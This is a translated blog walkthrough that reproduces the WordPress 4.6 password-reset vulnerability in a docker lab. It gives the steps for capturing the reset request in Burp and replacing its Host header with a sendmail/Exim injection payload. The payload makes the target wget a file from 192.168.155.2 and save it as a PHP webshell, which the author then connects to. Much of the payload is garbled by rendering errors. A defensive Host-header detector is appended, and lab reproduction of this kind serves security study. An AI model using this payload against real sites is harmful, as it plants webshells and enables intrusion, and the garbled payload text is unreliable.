Reproducing the WordPress 4.6 vulnerability


Abroad, WordPress, Drupal and Joomla are the three most popular CMSs; in China the leaders are DedeCMS, Empire CMS, PHPCMS and the like.
Domestic CMSs tend to aim for large, all-in-one feature sets, while foreign CMSs put more weight on the ecosystem and a friendly interface and leave more functionality to third-party plugins.
A few relatively new ones worth a look: ProcessWire, OctoberCMS, CraftCMS.

1. Building the environment

Enter the pwnscriptum directory under wordpress and run
docker-compose up -d to pull and start the environment.

Scan the WordPress version; only version 4.6 and below are affected by this vulnerability:
wpscan --url http://192.168.25.128:8080/

2. Reproducing the vulnerability

1. Capture the request

Click "Forgot Password" and enter the username or email address of the account you just created.

Enable packet capture and interception in Burp.

2. Prepare the payload

Replace the Host header of the intercepted password-reset request with the following value (reproduced exactly as it appears on the original page, where a math renderer has mangled the `$` expansions and parts are truncated):

Host: aa(any -froot@localhost -be KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{ {substr{0}{1}{ KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}usr{substr{0}{1}{ KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin{substr{0}{1}{ KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wget{substr{10}{1}{ KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}--output-docum…{substr{10}{1}{ KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}{substr{0}{1}{ KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}var {substr{0}{1}{ KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory} ̲}www {substr{0}{1}{ KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}html {substr{0}{1}{ KaTeX parse error: Expected 'EOF ', got '}' at position 16: spool_directory}̲}wutiangui.php {substr{10}{1}{ KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}192.168.155.2 :… {substr{0}{1}{$spool_directory}}payload.txt}} null)

This payload makes the target download the file payload.txt from 192.168.155.2 with wget and save it as wutiangui.php in the /var/www/html directory on the target machine.

3. Send the payload

Send the modified request through Burp; this writes a one-line PHP webshell (a "one-sentence Trojan") onto the target machine. Then use Burp again to test whether it was written successfully.
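As an added defender-side example (not part of the original write-up): the request above is only dangerous because the Host header value is reflected into the sender address that PHPMailer hands to sendmail/Exim, and a genuine virtual-host name can never contain spaces, parentheses or `${run{`. The check below validates Host values against a strict hostname[:port] grammar and flags the injection markers; the log-line format and the sample lines are constructed for the example.

```python
import re

# Grammar of a legitimate Host header: a hostname or IPv4 literal plus an optional port.
# The WordPress 4.6 password-reset bug works because the Host value ends up as the
# sender address that PHPMailer hands to sendmail/Exim; spaces, parentheses and
# "${run{...}}" can never occur in a real virtual-host name, so they are the tell.
HOST_RE = re.compile(
    r"^(?:"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*"
    r"|\d{1,3}(?:\.\d{1,3}){3}"
    r")(?::\d{1,5})?$",
    re.IGNORECASE,
)

# Substrings that mark a sendmail-option / Exim-expansion injection in the Host value.
INJECTION_MARKERS = ("(", " -f", " -be", "${run{", "substr{", "spool_directory", "tod_log")

def host_header_findings(host):
    """Return the reasons a Host value looks malicious; an empty list means it is benign."""
    reasons = []
    if not HOST_RE.match(host.strip()):
        reasons.append("not a valid hostname[:port]")
    reasons.extend(f"injection marker {m!r}" for m in INJECTION_MARKERS if m in host)
    return reasons

def scan_log(lines):
    """Scan lines of the constructed form: CLIENT "METHOD PATH" host="VALUE"."""
    line_re = re.compile(r'^(\S+) "(\S+) (\S+)" host="(.*)"$')
    hits = []
    for line in lines:
        m = line_re.match(line)
        if not m:
            continue  # skip lines that do not fit the constructed format
        client, _method, path, host = m.groups()
        reasons = host_header_findings(host)
        if reasons:
            hits.append({"client": client, "path": path, "host": host, "reasons": reasons})
    return hits

# Constructed sample log (not real traffic): two ordinary requests and one reset request
# whose Host header carries the option injection; the payload body is elided with "...".
SAMPLE_LOG = [
    '203.0.113.5 "POST /wp-login.php?action=lostpassword" host="192.168.25.128:8080"',
    '203.0.113.7 "GET /index.php" host="blog.example.com"',
    '198.51.100.9 "POST /wp-login.php?action=lostpassword" '
    'host="aa(any -froot@localhost -be ${run{...}} null)"',
]
```

On a real deployment the same grammar check belongs in front of the application (web server `server_name` matching or a fixed `wp_mail_from`), so an unexpected Host never reaches the mailer at all.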

4. Check whether the upload succeeded


The web page returns no error, so the write should have succeeded.
After execution, look in the following directory on the Docker host (the overlay2 hash is specific to this container):
/var/lib/docker/overlay2/b0766f51462cbcb76c2f483c439ab74adce69f6b1f5325b69f67ef889ee3b21e/merged/var/www/html

wutiangui.php has indeed been generated there.

5. Connect to the payload

Connected to the webshell successfully with Yujian.


Source: blog.csdn.net/wutiangui/article/details/132776485